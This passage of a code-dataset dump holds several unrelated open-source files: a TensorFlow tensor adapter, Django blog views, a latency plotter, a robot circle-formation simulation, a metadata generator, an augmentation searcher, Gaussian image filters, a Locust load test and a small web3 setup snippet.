if prev_dimension != row_splits[-1]:\n raise ValueError(\n (\"The sum of row lengths provided in '{}' does not match \"\n \"the previous dimension found {}.\").format(\n partition.row_length, prev_dimension))\n\n ragged_tensor = factory(ragged_tensor, row_splits=row_splits)\n prev_dimension = len(row_length)\n\n else:\n raise ValueError(\"Empty partition found.\")\n\n # Add back the last row split from the outer dimensions (D_n).\n outer_row_splits.append(outer_last_row_split)\n\n # Apply the outer ragged dimensions to the resulting tensor.\n # Now that the RaggedTensor is built up to the P_0 dimensions, we need to\n # specify the row splits for the D_n dimensions.\n for row_split in reversed(outer_row_splits):\n ragged_tensor = factory(ragged_tensor, row_splits=row_split)\n\n return ragged_tensor\n\n @staticmethod\n def CanHandle(arrow_schema: pa.Schema,\n tensor_representation: schema_pb2.TensorRepresentation) -> bool:\n \"\"\"Returns whether `tensor_representation` can be handled.\n\n The cases where the tensor_representation cannot be handled are:\n 1. Wrong column name / field name requested.\n 2. Non-leaf field is requested (for StructTypes).\n 3. There does not exist a ListType along the path.\n 4. Requested partition paths are not integer values or do not exist.\n\n Args:\n arrow_schema: The pyarrow schema.\n tensor_representation: The TensorRepresentation proto.\n \"\"\"\n ragged_tensor = tensor_representation.ragged_tensor\n if len(ragged_tensor.feature_path.step) < 1:\n return False\n\n value_path = path.ColumnPath.from_proto(ragged_tensor.feature_path)\n\n # Checking the outer dimensions represented by the value feature path.\n contains_list = False\n try:\n arrow_type = None\n for arrow_type in _EnumerateTypesAlongPath(arrow_schema, value_path):\n if _IsListLike(arrow_type):\n contains_list = True\n if pa.types.is_struct(arrow_type):\n # The path is depleted, but the last arrow_type is a struct. This means\n # the path is a non-leaf field.\n return False\n except ValueError:\n # ValueError signifies wrong column name / field name requested.\n return False\n if not contains_list:\n return False\n\n # Check the auxiliary features that need to be accessed to form the inner\n # dimensions partitions.\n parent_path = value_path.parent()\n\n # Check the columns exist and have the correct depth and type.\n for partition in ragged_tensor.partition:\n if partition.HasField(\"row_length\"):\n try:\n field_path = parent_path.child(partition.row_length)\n # To avoid loop undefined variable lint error.\n partition_type = arrow_schema.field(field_path.initial_step()).type\n for partition_type in _EnumerateTypesAlongPath(\n arrow_schema, field_path, stop_at_path_end=True):\n # Iterate through them all. Only interested in the last type.\n pass\n if not _IsListLike(partition_type) or not pa.types.is_integer(\n partition_type.value_type):\n return False\n except ValueError:\n # ValueError signifies wrong column name / field name requested.\n return False\n\n elif partition.HasField(\"uniform_row_length\"):\n if partition.uniform_row_length <= 0:\n return False\n else:\n return False\n\n # All checks passed successfully.\n return True\n\n\n# Mapping from TensorRepresentation's \"kind\" oneof field name to TypeHandler\n# classes. 
Note that one kind may have multiple handlers and the first one\n# whose CanHandle() returns true will be used.\n_TYPE_HANDLER_MAP = {\n \"dense_tensor\": [_DenseTensorHandler, _DefaultFillingDenseTensorHandler],\n \"varlen_sparse_tensor\": [_VarLenSparseTensorHandler],\n \"sparse_tensor\": [_SparseTensorHandler],\n \"ragged_tensor\": [_RaggedTensorHandler],\n}\n\n\ndef _BuildTypeHandlers(\n tensor_representations: Dict[str, schema_pb2.TensorRepresentation],\n arrow_schema: pa.Schema) -> List[Tuple[str, _TypeHandler]]:\n \"\"\"Builds type handlers according to TensorRepresentations.\"\"\"\n result = []\n for tensor_name, rep in tensor_representations.items():\n potential_handlers = _TYPE_HANDLER_MAP.get(rep.WhichOneof(\"kind\"))\n if not potential_handlers:\n raise ValueError(\"Unable to handle tensor {} with rep {}\".format(\n tensor_name, rep))\n found_handler = False\n for h in potential_handlers:\n if h.CanHandle(arrow_schema, rep):\n found_handler = True\n result.append((tensor_name, h(arrow_schema, rep)))\n break\n if not found_handler:\n raise ValueError(\"Unable to handle tensor {} with rep {} \"\n \"against schema: {}\".format(tensor_name, rep,\n arrow_schema))\n\n return result\n\n\ndef _IsListLike(arrow_type: pa.DataType) -> bool:\n return pa.types.is_list(arrow_type) or pa.types.is_large_list(arrow_type)\n\n\ndef _GetNestDepthAndValueType(\n arrow_schema: pa.Schema,\n column_path: path.ColumnPath) -> Tuple[int, pa.DataType]:\n \"\"\"Returns the depth of a leaf field, and its innermost value type.\n\n The depth is the number of nested lists in the leaf field.\n\n Args:\n arrow_schema: The arrow schema to traverse.\n column_path: A path of field names. The path must describe a leaf struct.\n Returns: A Tuple of depth and arrow type\n \"\"\"\n arrow_type = arrow_schema.field(column_path.steps()[0]).type\n depth = 0\n\n for arrow_type in _EnumerateTypesAlongPath(arrow_schema, column_path):\n if _IsListLike(arrow_type):\n depth += 1\n\n return depth, arrow_type\n\n\ndef _EnumerateTypesAlongPath(arrow_schema: pa.Schema,\n column_path: path.ColumnPath,\n stop_at_path_end: bool = False) -> typing.Iterator[pa.DataType]:\n \"\"\"Enumerates nested types along a column_path.\n\n A nested type is either a list-like type or a struct type.\n\n It uses `column_path`[0] to first address a field in the schema, and\n enumerates its type. If that type is nested, it enumerates its child and\n continues recursively until the column_path reaches an end. The child of a\n list-like type is its value type. The child of a struct type is the type of\n the child field of the name given by the corresponding step in the\n column_path.\n\n Args:\n arrow_schema: The arrow schema to traverse.\n column_path: A path of field names.\n stop_at_path_end: Whether to stop enumerating when all the steps in the\n column_path have been visited. This avoids descending further into
This will avoid keep enumerating on lists\n nesteness.\n\n Yields:\n The arrow type of each level in the schema.\n\n Raises:\n ValueError: If a step does not exist in the arrow schema.\n ValueError: If arrow_schema has no more struct fields, but we did not\n iterate through every field in column_path.\n \"\"\"\n field_name = column_path.initial_step()\n column_path = column_path.suffix(1)\n\n arrow_field = arrow_schema.field(field_name)\n arrow_type = arrow_field.type\n yield arrow_type\n\n while True:\n if stop_at_path_end and not column_path:\n break\n if pa.types.is_struct(arrow_type):\n # get the field from the StructType\n if not column_path:\n break\n curr_field_name = column_path.initial_step()\n column_path = column_path.suffix(1)\n try:\n arrow_field = arrow_type[curr_field_name]\n except KeyError as e:\n raise ValueError(\n \"Field '{}' could not be found in the current Struct: '{}'\".format(\n curr_field_name, arrow_type)) from e\n arrow_type = arrow_field.type\n elif _IsListLike(arrow_type):\n arrow_type = arrow_type.value_type\n else:\n yield arrow_type\n if column_path:\n raise ValueError(\n \"The arrow_schema fields are exhausted, but there are remaining \"\n \"fields in the column_path: '{}'\".format(column_path))\n break\n yield arrow_type\n\n\ndef _IsBinaryLike(arrow_type: pa.DataType) -> bool:\n return (pa.types.is_binary(arrow_type) or\n pa.types.is_large_binary(arrow_type) or\n pa.types.is_string(arrow_type) or\n pa.types.is_large_string(arrow_type))\n\n\ndef _IsSupportedArrowValueType(arrow_type: pa.DataType) -> bool:\n return (pa.types.is_integer(arrow_type) or pa.types.is_floating(arrow_type) or\n _IsBinaryLike(arrow_type))\n\n\ndef _ArrowTypeToTfDtype(arrow_type: pa.DataType) -> tf.DType:\n # TODO(zhuo): Remove the special handling for LargeString/Binary when\n # to_pandas_dtype() can handle them.\n if _IsBinaryLike(arrow_type):\n return tf.string\n return tf.dtypes.as_dtype(arrow_type.to_pandas_dtype())\n\n\ndef _GetAllowedDefaultValue(\n value_type: pa.DataType,\n default_value_proto: schema_pb2.TensorRepresentation.DefaultValue\n) -> Union[int, float, bytes]:\n \"\"\"Returns the default value set in DefaultValue proto or raises.\"\"\"\n kind = default_value_proto.WhichOneof(\"kind\")\n if kind in (\"int_value\", \"uint_value\") and pa.types.is_integer(value_type):\n value = getattr(default_value_proto, kind)\n iinfo = np.iinfo(value_type.to_pandas_dtype())\n if value <= iinfo.max and value >= iinfo.min:\n return value\n else:\n raise ValueError(\"Integer default value out of range: {} is set for a \"\n \"{} column\".format(value, value_type))\n elif kind == \"float_value\" and pa.types.is_floating(value_type):\n return default_value_proto.float_value\n elif kind == \"bytes_value\" and _IsBinaryLike(value_type):\n return default_value_proto.bytes_value\n\n raise ValueError(\n \"Incompatible default value: {} is set for a {} column\".format(\n kind, value_type))\n\n\ndef _GetDefaultFill(\n unbatched_shape: List[int], value_type: pa.DataType,\n default_value_proto: schema_pb2.TensorRepresentation.DefaultValue\n) -> pa.Array:\n \"\"\"Returns an Array full of the default value given in the proto.\"\"\"\n\n size = int(np.prod(unbatched_shape, initial=1))\n return pa.array(\n [_GetAllowedDefaultValue(value_type, default_value_proto)] * size,\n type=value_type)\n\n\ndef _GetConvertToBinaryFn(\n array_type: pa.DataType) -> Optional[Callable[[pa.Array], pa.Array]]:\n \"\"\"Returns a function that converts a StringArray to BinaryArray.\"\"\"\n\n if 
pa.types.is_string(array_type):\n return lambda array: array.view(pa.binary())\n if pa.types.is_large_string(array_type):\n return lambda array: array.view(pa.large_binary())\n return None\n\n\ndef _FloorDivide(array, num_elements: int):\n # The most common trivial case can avoid producing new arrays.\n if num_elements == 1:\n return array\n result, remainder = np.divmod(array, num_elements)\n if not np.all(remainder == 0):\n raise RuntimeError(\n \"Remainder found when dividing array with {}.\".format(num_elements))\n return result\n","repo_name":"tensorflow/tfx-bsl","sub_path":"tfx_bsl/tfxio/tensor_adapter.py","file_name":"tensor_adapter.py","file_ext":"py","file_size_in_byte":38363,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"53"} +{"seq_id":"42064809133","text":"from django.shortcuts import render\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.shortcuts import redirect\nfrom django.shortcuts import get_object_or_404\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.views.generic.detail import DetailView\nfrom django.views.generic.edit import DeleteView,CreateView,UpdateView\nfrom django.urls import reverse_lazy\nfrom blog.models import Blog,Comments\nfrom blog.forms import User_login,Normal,Image,Video,audio,documents,Com\n# Create your views here.\ndef homeblog(request):\n model = Blog.objects.all()\n if request.method == \"POST\":\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(request, username=username,password=password)\n if user:\n login(request,user)\n return render(request,'sim/home.html',{'model':model})\n\ndef signup(request):\n form = User_login\n signedup = False\n if request.method == \"POST\":\n form2 = form(request.POST)\n if form2.is_valid():\n f = form2.save()\n f.set_password(f.password)\n f.save()\n signedup = True\n context = {'signup':True,'form':form,'signedup':signedup}\n return render(request,'sim/signin.html',context)\n\n@login_required\ndef out(request):\n logout(request)\n return redirect('homeblog')\n\n@login_required\ndef normalblog(request,pk):\n form = Normal\n norm = True\n user = get_object_or_404(User, pk=pk)\n if request.method == \"POST\":\n form = Normal(request.POST, request.FILES)\n if form.is_valid():\n f = form.save(commit=False)\n f.user = user\n f.save()\n return redirect('homeblog')\n context = {'form':form,'norm':norm}\n return render(request,'sim/upload.html',context)\n\n@login_required\ndef imgblog(request,pk):\n form = Image\n img = True\n user = get_object_or_404(User, pk=pk)\n if request.method == \"POST\":\n form = Image(request.POST, request.FILES)\n if form.is_valid():\n f = form.save(commit=False)\n f.user = user\n f.save()\n return redirect('homeblog')\n context = {'form':form,'img':img}\n return render(request,'sim/upload.html',context)\n\n@login_required\ndef vidblog(request,pk):\n form = Video\n vid = True\n user = get_object_or_404(User, pk=pk)\n if request.method == \"POST\":\n form = Video(request.POST, request.FILES)\n if form.is_valid():\n f = form.save(commit=False)\n f.user = user\n f.save()\n return redirect('homeblog')\n context = {'form':form,'vid':vid}\n return render(request,'sim/upload.html',context)\n\n@login_required\ndef audblog(request,pk):\n form = audio\n aud = True\n user = get_object_or_404(User, pk=pk)\n if request.method == \"POST\":\n form = 
audio(request.POST, request.FILES)\n if form.is_valid():\n f = form.save(commit=False)\n f.user = user\n f.save()\n return redirect('homeblog')\n context = {'form':form,'aud':aud}\n return render(request,'sim/upload.html',context)\n\n@login_required\ndef Docblog(request,pk):\n form = documents\n doc = True\n user = get_object_or_404(User, pk=pk)\n if request.method == \"POST\":\n form = documents(request.POST, request.FILES)\n if form.is_valid():\n f = form.save(commit=False)\n f.user = user\n f.save()\n return redirect('homeblog')\n context = {'form':form,'doc':doc}\n return render(request,'sim/upload.html',context)\n\nclass Detail(LoginRequiredMixin,DetailView):\n model = Blog\n template_name = 'sim/detail.html'\n\n@login_required\ndef createcomment(request,pk,opk):\n user = get_object_or_404(User, pk=pk)\n blog = get_object_or_404(Blog, pk=opk)\n form = Com\n if request.method == \"POST\":\n form = Com(request.POST, request.FILES)\n if form.is_valid():\n f = form.save(commit=False)\n f.user = user\n f.blog = blog\n f.save()\n return redirect('homeblog')\n context = {'form':form}\n return render(request,'sim/postcomment.html',context)\n\nclass Commentupdate(LoginRequiredMixin,UpdateView):\n model = Comments\n fields = ['comment']\n template_name = 'sim/editcomment.html'\n\nclass Commentdelete(LoginRequiredMixin,DeleteView):\n model = Comments\n template_name = 'sim/deletecomment.html'\n success_url = reverse_lazy('homeblog')\n\nclass Postupdate(LoginRequiredMixin,UpdateView):\n model = Blog\n fields = ['title','post']\n template_name = 'sim/editpost.html'\n\nclass Postdelete(LoginRequiredMixin,DeleteView):\n model = Blog\n template_name = 'sim/deletepost.html'\n success_url = reverse_lazy('homeblog')\n","repo_name":"VKM-BOSS/porto","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74471029286","text":"import csv\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n#CSV_FILE = 'BBLATENCY2022-06-30T12-25-40.csv'\nCSV_FILE = 'SINGLE_SD_2022-06-30.csv'\nUNIQUE_NAMES = ['MONA', 'LISA', 'BOSSA', 'NOVA', 'TERRA', 'COTA']\nRENAMES = {\n 'MONA' : 'NF1',\n 'LISA' : 'NF2',\n 'BOSSA' : 'NF3',\n 'NOVA' : 'NF4',\n 'TERRA' : 'NF5',\n 'COTA' : 'NF6'\n}\ndata = {}\n\n#init data\nfor name in UNIQUE_NAMES:\n data[name] = []\n\ndef get_data():\n global data\n with open(CSV_FILE, 'r') as csvfile:\n reader = csv.reader(csvfile)\n # skip the header row\n next(reader)\n for row in reader:\n # column 0 is the name, column 1 is the latency\n data[row[0]].append(float(row[1]))\n\ndef plot_data():\n # reference each series from the global data dict\n local_data = {}\n for name in UNIQUE_NAMES:\n local_data[name] = data[name]\n # plot each latency series\n for name in UNIQUE_NAMES:\n plt.plot(local_data[name], label=RENAMES[name])\n # add the legend and show the plot\n plt.legend()\n plt.show()\n \n\ndef main():\n global data\n get_data()\n plot_data()\n \n stats = {}\n for name in UNIQUE_NAMES:\n stats[name] = {}\n # round to 3 decimal places\n stats[name]['mean'] = round(np.mean(data[name]), 3)\n stats[name]['std'] = round(np.std(data[name]), 3)\n stats[name]['min'] = round(np.min(data[name]), 3)\n stats[name]['max'] = round(np.max(data[name]), 3)\n\n # print headers\n print(\"{:<20}{:<20}{:<20}{:<20}{:<20}\".format(\"Name\", \"Mean\", \"Std\", \"Min\", \"Max\"))\n\n for name in UNIQUE_NAMES:\n print(\"{:<20}\".format(RENAMES[name]), end='')\n for key in stats[name]:\n print(\"{:<20}\".format(stats[name][key]), end='')\n print()\n 
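# example output of the loop above (values illustrative):\n # Name Mean Std Min Max\n # NF1 12.345 1.234 10.001 15.002\n 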
print()\n\n\n\n return\n\nif __name__ == '__main__':\n main()","repo_name":"AdmiralPuni/pifly","sub_path":"latencyproc/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42185641142","text":"import pygame\nimport sys\nimport random\nimport math\nimport numpy as np\n\npygame.init()\n\nblack = [0, 0, 0]\nwhite = [255, 255, 255]\n\nsize = (800, 800)\nscreen = pygame.display.set_mode(size)\n\nclock = pygame.time.Clock()\n\n\n'''Coordinates'''\n# create random initial coordinates for the robots\nn_robots = 110\nD = 250\nstep = 0.01\n#sep = math.pi*D/(n_robots-20)\nsep = D/2*math.sqrt(2)*4/(n_robots-10)\nrobots_pos = np.random.randint(-200, 1000, (n_robots, 2))\nrobots_pos = robots_pos.astype('float64') \n\ndef update_robots_position(n_robots, D, step, sep, robots_pos):\n \n for i in range(0, n_robots):\n \n r = robots_pos[i]\n \n v = robots_pos - r\n dist = [np.linalg.norm(d) for d in v]\n F = robots_pos[np.argmax(dist)] \n dist[i] = 10 # exclude the robot itself from the nearest-neighbour search\n N = robots_pos[np.argmin(dist)]\n \n midpoint = (N + F)/2 \n v_midpoint = midpoint - r\n \n if np.linalg.norm(v_midpoint, ord = 1) >= D/2:\n robots_pos[i] += step*v_midpoint\n else:\n robots_pos[i] -= step*v_midpoint\n \n v_nearestpoint = N - r\n \n if np.linalg.norm(v_nearestpoint, ord = 1) >= sep:\n robots_pos[i] += step*v_nearestpoint\n else:\n robots_pos[i] -= step*v_nearestpoint\n \n return robots_pos \n\n'''Event loop'''\nfrec=30 \nwhile True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n\n \n screen.fill(black)\n\n \n for coord in robots_pos:\n pygame.draw.circle(screen, white, coord, 2)\n \n robots_pos = update_robots_position(n_robots, D, step, sep, robots_pos) \n \n if frec<=1000:\n frec += 0.1\n else: frec = 1000\n pygame.display.flip()\n clock.tick(frec)\n","repo_name":"DaniLazaro97/Tanaka-Circle-Formation-Algorithm","sub_path":"TANAKA ALGO CIRCLE FORMATION ANIMATION.py","file_name":"TANAKA ALGO CIRCLE FORMATION ANIMATION.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9651481979","text":"import json\nimport pathlib\nfrom datetime import datetime\nimport pandas as pd\n\nVERSION_FIELD = 'Mapping Version'\nEPO_VERSION_FIELD = 'EPO version'\nDESCRIPTION_FIELD = \"Description\"\nTITLE_FIELD = 'Title'\nIDENTIFIER_FIELD = 'Identifier'\nE_FORMS_SUBTYPE_FIELD = \"eForms Subtype\"\nSTART_DATE_FIELD = \"Start Date\"\nEND_DATE_FIELD = \"End Date\"\nMIN_XSD_VERSION_FIELD = \"Min XSD Version\"\nMAX_XSD_VERSION_FIELD = \"Max XSD Version\"\n\nE_FORMS_SUBTYPE_KEY = \"eforms_subtype\"\nSTART_DATE_KEY = \"start_date\"\nEND_DATE_KEY = \"end_date\"\nMIN_XSD_VERSION_KEY = \"min_xsd_version\"\nMAX_XSD_VERSION_KEY = \"max_xsd_version\"\nTITLE_KEY = \"title\"\nCREATED_KEY = \"created_at\"\nIDENTIFIER_KEY = \"identifier\"\nVERSION_KEY = \"version\"\nDESCRIPTION_KEY = \"description\"\nONTOLOGY_VERSION_KEY = \"ontology_version\"\nMETADATA_CONSTRAINTS_KEY = \"metadata_constraints\"\nCONSTRAINTS_KEY = \"constraints\"\n\nCONCEPTUAL_MAPPINGS_METADATA_SHEET_NAME = \"Metadata\"\n\n\ndef generate_metadata(raw_metadata: dict) -> str:\n \"\"\"\n This function restructures the metadata into a default format.\n The metadata has two parts: metadata for the mapping suite and constraints on the mapping suite.\n :param raw_metadata:\n :return:\n \"\"\"\n\n def 
get_list_from_raw_metadata(field_key: str) -> list:\n data = raw_metadata[field_key][0]\n if pd.notna(data):\n return [x.strip() for x in str(data).split(',')]\n else:\n return []\n\n constraints = {E_FORMS_SUBTYPE_KEY: [int(float(x)) for x in get_list_from_raw_metadata(E_FORMS_SUBTYPE_FIELD)],\n START_DATE_KEY: get_list_from_raw_metadata(START_DATE_FIELD),\n END_DATE_KEY: get_list_from_raw_metadata(END_DATE_FIELD),\n MIN_XSD_VERSION_KEY: get_list_from_raw_metadata(MIN_XSD_VERSION_FIELD),\n MAX_XSD_VERSION_KEY: get_list_from_raw_metadata(MAX_XSD_VERSION_FIELD)}\n\n metadata = {TITLE_KEY: raw_metadata[TITLE_FIELD][0], IDENTIFIER_KEY: raw_metadata[IDENTIFIER_FIELD][0],\n CREATED_KEY: datetime.now().isoformat(), VERSION_KEY: raw_metadata[VERSION_FIELD][0],\n ONTOLOGY_VERSION_KEY: raw_metadata[EPO_VERSION_FIELD][0],\n DESCRIPTION_KEY: raw_metadata[DESCRIPTION_FIELD][0],\n METADATA_CONSTRAINTS_KEY: {CONSTRAINTS_KEY: constraints}}\n return json.dumps(metadata)\n\n\ndef mapping_suite_processor_generate_metadata(conceptual_mappings_file_path: pathlib.Path,\n output_metadata_file_path: pathlib.Path):\n \"\"\"\n This function reads metadata from conceptual_mapping_file and generates metadata for a mapping suite package.\n The result is written to the output_metadata_file file.\n :param conceptual_mappings_file_path:\n :param output_metadata_file_path:\n :return:\n \"\"\"\n with open(conceptual_mappings_file_path, 'rb') as excel_file:\n conceptual_mappings_metadata_df = pd.read_excel(excel_file, sheet_name=CONCEPTUAL_MAPPINGS_METADATA_SHEET_NAME)\n raw_metadata = conceptual_mappings_metadata_df.set_index('Field').T.to_dict('list')\n metadata = generate_metadata(raw_metadata=raw_metadata)\n\n with open(output_metadata_file_path, 'w') as metadata_file:\n metadata_file.write(metadata)\n","repo_name":"valipopa/ted-sws","sub_path":"ted_sws/mapping_suite_processor/services/conceptual_mapping_generate_metadata.py","file_name":"conceptual_mapping_generate_metadata.py","file_ext":"py","file_size_in_byte":3252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"3031808863","text":"from hydra.utils import instantiate\nfrom pytorch_lightning import seed_everything\n\nfrom autoalbument.faster_autoaugment.datamodule import FasterAutoAugmentDataModule\nfrom autoalbument.faster_autoaugment.models.faa_model import (\n FAAClassificationModel,\n FAASemanticSegmentationModel,\n)\nfrom autoalbument.search_interface import SearcherBase\n\n\nclass FasterAutoAugmentSearcher(SearcherBase):\n def __init__(self, cfg):\n super().__init__()\n self.cfg = cfg\n self.set_seed()\n self.model = self.create_model()\n self.datamodule = self.create_datamodule()\n self.trainer = self.create_trainer()\n\n def set_seed(self):\n seed = getattr(self.cfg, \"seed\", None)\n if seed is None:\n return\n seed_everything(seed)\n\n def create_model(self):\n cfg = self.cfg\n task = cfg.task\n if task == \"semantic_segmentation\":\n return FAASemanticSegmentationModel(cfg)\n elif task == \"classification\":\n return FAAClassificationModel(cfg)\n raise ValueError(f\"Unsupported task: {task}. 
Supported tasks: classification, semantic_segmentation.\")\n\n def create_datamodule(self):\n datamodule = FasterAutoAugmentDataModule(self.cfg.data)\n return datamodule\n\n def create_logger(self):\n logger = instantiate(self.cfg.logger)\n return logger\n\n def create_callbacks(self):\n callbacks = self.cfg.callbacks\n if not callbacks:\n return []\n return [instantiate(callback) for callback in callbacks]\n\n def create_trainer_additional_params(self):\n logger = self.create_logger()\n callbacks = self.create_callbacks()\n return {\n \"logger\": logger,\n \"callbacks\": callbacks,\n }\n\n def create_trainer(self):\n cfg = self.cfg\n additional_params = self.create_trainer_additional_params()\n trainer = instantiate(cfg.trainer, **additional_params)\n return trainer\n\n def search(self):\n self.trainer.fit(self.model, datamodule=self.datamodule)\n","repo_name":"albumentations-team/autoalbument","sub_path":"autoalbument/faster_autoaugment/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","stars":192,"dataset":"github-code","pt":"53"} +{"seq_id":"73687250727","text":"# import packages: numpy, math (you might need pi for gaussian functions)\r\nimport numpy as np\r\nimport math\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.signal import convolve2d as conv2d\r\n\r\n\r\n\"\"\"\r\nGaussian function taking as argument the standard deviation sigma\r\nThe filter should be defined for all integer values x in the range [-3sigma,3sigma]\r\nThe function should return the Gaussian values Gx computed at the indexes x\r\n\"\"\"\r\ndef gauss(sigma):\r\n # Generate a vector x of values on which the Gaussian filter is defined: integer values on the interval [-3*sigma, 3*sigma]\r\n low = int(-3*sigma)\r\n high = int(3*sigma)\r\n range_x = [i for i in range(low, high+1)]\r\n Gx = []\r\n for x in range_x:\r\n G = (np.exp((-x ** 2) / (2 * (sigma ** 2))))* (1 / (math.sqrt(2 * math.pi)* sigma)) # Gaussian formula\r\n Gx.append(G)\r\n\r\n # Gx is a list of the values computed with the Gaussian formula\r\n return np.array(Gx), range_x\r\n\r\n\r\n\"\"\"\r\nImplement a 2D Gaussian filter, leveraging the previous gauss.\r\nImplement the filter from scratch or leverage the convolve2D method (scipy.signal)\r\nLeverage the separability of Gaussian filtering\r\nInput: image, sigma (standard deviation)\r\nOutput: smoothed image\r\n\"\"\"\r\ndef gaussianfilter(img, sigma):\r\n\r\n # fill the kernel with the values on which the G filter is defined (range [-3*sigma,3*sigma])\r\n # extract the first row of the kernel\r\n Gx = gauss(sigma)[0]\r\n\r\n Gx = Gx.reshape(1, Gx.size) # conv2d needs a 2-D input\r\n\r\n\r\n # computing the first convolution\r\n tmp_img = conv2d(img, Gx, mode='full', boundary='fill', fillvalue=0)\r\n # now tmp_img (the output of the first convolution) is an array\r\n\r\n\r\n\r\n Gy = np.transpose(Gx)\r\n\r\n # computing the second convolution (on the output of the first one)\r\n smooth_img = conv2d(tmp_img, Gy, mode='full', boundary='fill', fillvalue=0)\r\n # SOURCE: https://docs.scipy.org/doc/scipy/reference/generated/scipy.signal.convolve2d.html\r\n\r\n return smooth_img\r\n\r\n\"\"\"\r\nGaussian derivative function taking as argument the standard deviation sigma\r\nThe filter should be defined for all integer values x in the range [-3sigma,3sigma]\r\nThe function should return the Gaussian derivative values Dx computed at the indexes x\r\n\"\"\"\r\ndef gaussdx(sigma):\r\n\r\n 
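# same support as gauss(): integer x values in [-3*sigma, 3*sigma]\r\n 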
low = int(-3*sigma)\r\n high = int(3*sigma)\r\n range_x = [i for i in range(low, high+1)]\r\n Dx = []\r\n for x in range_x:\r\n # First derivative of the Gaussian formula\r\n G = -x*(np.exp((-x ** 2) / (2 * (sigma ** 2))))* (1 / (math.sqrt(2 * math.pi)* (sigma**3)))\r\n Dx.append(G)\r\n return np.array(Dx), range_x\r\n\r\ndef gaussderiv(img, sigma):\r\n\r\n smooth_img = gaussianfilter(img, sigma) # Call the Gaussian filter function to get the smoothed image\r\n\r\n Dx = np.array( [[-1,0,1], # Kernel used to take the derivative in the x direction\r\n [-1,0,1],\r\n [-1,0,1]])\r\n Dx = Dx/3\r\n\r\n Dy = np.transpose(Dx) # Kernel used to take the derivative in the y direction\r\n\r\n imgDx = conv2d(smooth_img, Dx, mode='full', boundary='fill', fillvalue=0) # convolving the smoothed image in the X direction\r\n\r\n imgDy = conv2d(smooth_img, Dy, mode='full', boundary='fill', fillvalue=0) # convolving the smoothed image in the Y direction\r\n\r\n return imgDx, imgDy\r\n","repo_name":"MertYILDIZ19/Image-Filtering-and-Object-Identification","sub_path":"gauss_module.py","file_name":"gauss_module.py","file_ext":"py","file_size_in_byte":3353,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"22696171607","text":"import time, json\nfrom locust import HttpUser, task, between\n\norder = {\n \"orderId\": 20001,\n \"customerId\": \"AROUT\",\n \"employeeId\": 1,\n \"shipperId\": 3,\n \"orderDate\": \"1998-05-05T04:00:00.000Z\",\n \"requiredDate\": \"1998-06-02T04:00:00.000Z\",\n \"shippedDate\": \"1998-06-02T04:00:00.000Z\",\n \"freight\": 0.93,\n \"shipName\": \"LILA-Supermercado\",\n \"shipAddress\": \"Carrera 52 con Ave. Bolívar #65-98 Llano Largo\",\n \"shipCity\": \"Barquisimeto\",\n \"shipRegion\": \"Lara\",\n \"shipPostalCode\": \"3508\",\n \"shipCountry\": \"Venezuela\",\n \"orderDetails\": [\n {\n \"orderId\": 20001,\n \"productId\": 7,\n \"unitPrice\": 30,\n \"quantity\": 15,\n \"discount\": 0.05,\n \"product\": {\n \"productId\": 7,\n \"productName\": \"Uncle Bobs Organic Dried Pears\",\n \"quantityPerUnit\": \"12 - 1 lb pkgs.\",\n \"unitPrice\": 30,\n \"unitsInStock\": 15,\n \"unitsOnOrder\": 0,\n \"discontinued\": False\n }\n },\n {\n \"orderId\": 20001,\n \"productId\": 13,\n \"unitPrice\": 6,\n \"quantity\": 10,\n \"discount\": 0.05,\n \"product\": {\n \"productId\": 13,\n \"productName\": \"Konbu\",\n \"quantityPerUnit\": \"2 kg box\",\n \"unitPrice\": 6,\n \"unitsInStock\": 24,\n \"unitsOnOrder\": 0,\n \"discontinued\": False\n }\n }\n ]\n }\n\nclass CreateOrder(HttpUser):\n \n wait_time = between(0.5, 1.2)\n\n @task(3)\n def create_order(self):\n self.client.post(\"/purchase/order\", data=json.dumps(order), headers={ 'Content-Type': 'application/json'})\n","repo_name":"nullpointer-excelsior/nestjs-northwind-hexagonal","sub_path":"stress-test/locustfile_create_orders.py","file_name":"locustfile_create_orders.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"2520601265","text":"from web3 import Web3\n\nprovider_rpc = {\n \"development\": \"https://goerli.infura.io/v3/3622806d884b401498e7a07f3f325d2e\"\n}\nweb3 = Web3(Web3.HTTPProvider(provider_rpc[\"development\"])) # Change to correct network\n\naccount_from = {\n \"private_key\": \"\",\n \"address\": \"0x1Abf3a6C41035C1d2A3c74ec22405B54450f5e13\",\n}\naddress_to = \"0x5aDF576358c64d33C61378876cbfA342aff9a5D4\"\n\n
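# NOTE: account_from[\"private_key\"] above is left blank in this snippet;\n# the signTransaction call below requires a real key, which should never be\n# committed to a repository.\n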
